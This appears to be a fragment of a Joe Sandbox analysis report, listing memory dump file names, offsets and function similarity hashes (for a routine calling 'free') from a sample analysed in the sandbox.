                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          • Opcode ID: eb6980ff63f7418b59a053bccab6031837ab5df54200871fcb502bc07e3f4ea8
                                                                                                                                                                                                                          • Instruction ID: 8fadb46bb95f33f37450bc0e64b947a621f7e139353adc2e5b8383532bc84104
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb6980ff63f7418b59a053bccab6031837ab5df54200871fcb502bc07e3f4ea8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0E9B17015016BEB00EB6ADC89E27736CEF45195B040439ED1DC7B00D726F51187F5